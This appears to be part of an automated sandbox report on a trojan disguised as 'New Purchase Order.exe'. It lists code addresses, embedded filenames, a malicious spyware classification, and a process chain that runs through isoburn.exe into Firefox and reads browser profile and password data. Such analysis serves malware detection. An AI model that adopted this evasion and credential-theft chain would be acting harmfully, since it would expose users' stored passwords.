                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F01008_2_016F0100
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B81CC8_2_017B81CC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C01AA8_2_017C01AA
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B41A28_2_017B41A2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017920008_2_01792000
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BA3528_2_017BA352
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170E3F08_2_0170E3F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C03E68_2_017C03E6
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A02748_2_017A0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017802C08_2_017802C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017005358_2_01700535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C05918_2_017C0591
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B24468_2_017B2446
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A44208_2_017A4420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017AE4F68_2_017AE4F6
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017007708_2_01700770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017247508_2_01724750
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FC7C08_2_016FC7C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171C6E08_2_0171C6E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017169628_2_01716962
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017029A08_2_017029A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017CA9A68_2_017CA9A6
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170A8408_2_0170A840
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017028408_2_01702840
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172E8F08_2_0172E8F0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016E68B88_2_016E68B8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BAB408_2_017BAB40
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B6BD78_2_017B6BD7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FEA808_2_016FEA80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179CD1F8_2_0179CD1F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170AD008_2_0170AD00
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016FADE08_2_016FADE0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01718DBF8_2_01718DBF
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700C008_2_01700C00
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F0CF28_2_016F0CF2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A0CB58_2_017A0CB5
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01774F408_2_01774F40
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01720F308_2_01720F30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A2F308_2_017A2F30
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01742F288_2_01742F28
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170CFE08_2_0170CFE0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F2FC88_2_016F2FC8
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177EFA08_2_0177EFA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01700E598_2_01700E59
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BEE268_2_017BEE26
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BEEDB8_2_017BEEDB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01712E908_2_01712E90
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BCE938_2_017BCE93
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017CB16B8_2_017CB16B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016EF1728_2_016EF172
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0173516C8_2_0173516C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0170B1B08_2_0170B1B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B70E98_2_017B70E9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BF0E08_2_017BF0E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017070C08_2_017070C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017AF0CC8_2_017AF0CC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016ED34C8_2_016ED34C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B132D8_2_017B132D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0174739A8_2_0174739A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A12ED8_2_017A12ED
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171B2C08_2_0171B2C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017052A08_2_017052A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B75718_2_017B7571
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017C95C38_2_017C95C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179D5B08_2_0179D5B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F14608_2_016F1460
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BF43F8_2_017BF43F
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BF7B08_2_017BF7B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017456308_2_01745630
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B16CC8_2_017B16CC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017099508_2_01709950
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171B9508_2_0171B950
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017959108_2_01795910
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0176D8008_2_0176D800
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017038E08_2_017038E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BFB768_2_017BFB76
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01775BF08_2_01775BF0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0173DBF98_2_0173DBF9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171FB808_2_0171FB80
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01773A6C8_2_01773A6C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BFA498_2_017BFA49
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B7A468_2_017B7A46
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017ADAC68_2_017ADAC6
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01745AA08_2_01745AA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0179DAAC8_2_0179DAAC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017A1AA38_2_017A1AA3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B7D738_2_017B7D73
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017B1D5A8_2_017B1D5A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01703D408_2_01703D40
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171FDC08_2_0171FDC0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01779C328_2_01779C32
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BFCF28_2_017BFCF2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BFF098_2_017BFF09
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_017BFFB18_2_017BFFB1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01701F928_2_01701F92
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01709EB08_2_01709EB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0522053512_2_05220535
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052E059112_2_052E0591
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052C442012_2_052C4420
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D244612_2_052D2446
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052CE4F612_2_052CE4F6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0522077012_2_05220770
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0524475012_2_05244750
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0521C7C012_2_0521C7C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0523C6E012_2_0523C6E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0521010012_2_05210100
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052BA11812_2_052BA118
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052A815812_2_052A8158
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052E01AA12_2_052E01AA
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D41A212_2_052D41A2
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D81CC12_2_052D81CC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052B200012_2_052B2000
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DA35212_2_052DA352
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052E03E612_2_052E03E6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0522E3F012_2_0522E3F0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052C027412_2_052C0274
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052A02C012_2_052A02C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0522AD0012_2_0522AD00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052BCD1F12_2_052BCD1F
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05238DBF12_2_05238DBF
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0521ADE012_2_0521ADE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05220C0012_2_05220C00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052C0CB512_2_052C0CB5
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05210CF212_2_05210CF2
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05262F2812_2_05262F28
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05240F3012_2_05240F30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052C2F3012_2_052C2F30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05294F4012_2_05294F40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0529EFA012_2_0529EFA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0522CFE012_2_0522CFE0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05212FC812_2_05212FC8
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DEE2612_2_052DEE26
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05220E5912_2_05220E59
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05232E9012_2_05232E90
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DCE9312_2_052DCE93
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DEEDB12_2_052DEEDB
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0523696212_2_05236962
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052229A012_2_052229A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052EA9A612_2_052EA9A6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0522284012_2_05222840
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0522A84012_2_0522A840
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052068B812_2_052068B8
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0524E8F012_2_0524E8F0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DAB4012_2_052DAB40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D6BD712_2_052D6BD7
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0521EA8012_2_0521EA80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D757112_2_052D7571
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052BD5B012_2_052BD5B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DF43F12_2_052DF43F
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0521146012_2_05211460
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DF7B012_2_052DF7B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D16CC12_2_052D16CC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052EB16B12_2_052EB16B
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0525516C12_2_0525516C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0520F17212_2_0520F172
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0522B1B012_2_0522B1B0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D70E912_2_052D70E9
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DF0E012_2_052DF0E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052CF0CC12_2_052CF0CC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052270C012_2_052270C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D132D12_2_052D132D
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0520D34C12_2_0520D34C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0526739A12_2_0526739A
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052252A012_2_052252A0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052C12ED12_2_052C12ED
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0523B2C012_2_0523B2C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D7D7312_2_052D7D73
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05223D4012_2_05223D40
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D1D5A12_2_052D1D5A
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0523FDC012_2_0523FDC0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05299C3212_2_05299C32
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DFCF212_2_052DFCF2
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DFF0912_2_052DFF09
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DFFB112_2_052DFFB1
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05221F9212_2_05221F92
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05229EB012_2_05229EB0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052B591012_2_052B5910
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0522995012_2_05229950
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0523B95012_2_0523B950
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0528D80012_2_0528D800
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052238E012_2_052238E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DFB7612_2_052DFB76
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0523FB8012_2_0523FB80
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05295BF012_2_05295BF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_0525DBF912_2_0525DBF9
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05293A6C12_2_05293A6C
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052DFA4912_2_052DFA49
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052D7A4612_2_052D7A46
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_05265AA012_2_05265AA0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052BDAAC12_2_052BDAAC
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052C1AA312_2_052C1AA3
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_052CDAC612_2_052CDAC6
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FA1C3012_2_02FA1C30
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02F9CAF012_2_02F9CAF0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02F9CAE812_2_02F9CAE8
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02F9AE5012_2_02F9AE50
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02F9AE4512_2_02F9AE45
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02F9CD1012_2_02F9CD10
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02F9AD0012_2_02F9AD00
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FA52C012_2_02FA52C0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FA34D012_2_02FA34D0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_02FBB9E012_2_02FBB9E0
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_050BE77012_2_050BE770
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_050BE3D312_2_050BE3D3
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_050BE2B412_2_050BE2B4
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 12_2_050BD83812_2_050BD838
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 01735130 appears 58 times
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 0176EA12 appears 86 times
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 0177F290 appears 105 times
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 01747E54 appears 111 times
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: String function: 016EB970 appears 277 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0528EA12 appears 86 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0520B970 appears 277 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 05255130 appears 58 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0529F290 appears 105 times
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 05267E54 appears 102 times
                Source: New Purchase Order.exe, 00000000.00000002.1297790798.0000000001454000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1308258582.0000000009F00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1297790798.000000000141E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000000.1256910262.0000000000E52000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFBjZ.exe0 vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1298865239.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1299749655.0000000004AA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000000.00000002.1305864581.0000000008040000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000008.00000002.1802567314.00000000017ED000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New Purchase Order.exe
                Source: New Purchase Order.exe, 00000008.00000002.1801973908.0000000001267000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameISOBURN.EXEj% vs New Purchase Order.exe
                Source: New Purchase Order.exeBinary or memory string: OriginalFilenameFBjZ.exe0 vs New Purchase Order.exe
                Source: New Purchase Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: New Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, HkgQ1AqdtvsFLjtQSt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, HkgQ1AqdtvsFLjtQSt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, s88TJA4JmXfoe4olV8.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, s88TJA4JmXfoe4olV8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.9f00000.5.raw.unpack, s88TJA4JmXfoe4olV8.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, s88TJA4JmXfoe4olV8.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, s88TJA4JmXfoe4olV8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, s88TJA4JmXfoe4olV8.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, s88TJA4JmXfoe4olV8.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, s88TJA4JmXfoe4olV8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.New Purchase Order.exe.4d207a0.2.raw.unpack, s88TJA4JmXfoe4olV8.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.New Purchase Order.exe.4daadc0.3.raw.unpack, HkgQ1AqdtvsFLjtQSt.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@5/4
                Source: C:\Users\user\Desktop\New Purchase Order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Purchase Order.exe.logJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\isoburn.exeFile created: C:\Users\user~1\AppData\Local\Temp\l420377xJump to behavior
                Source: New Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: New Purchase Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: isoburn.exe, 0000000C.00000003.2003864752.00000000034C4000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2501042971.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000002.2501042971.0000000003514000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.2007358817.00000000034F0000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000C.00000003.2003864752.00000000034E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: New Purchase Order.exeReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
                Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"Jump to behavior
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: amsi.dllJump to behavior
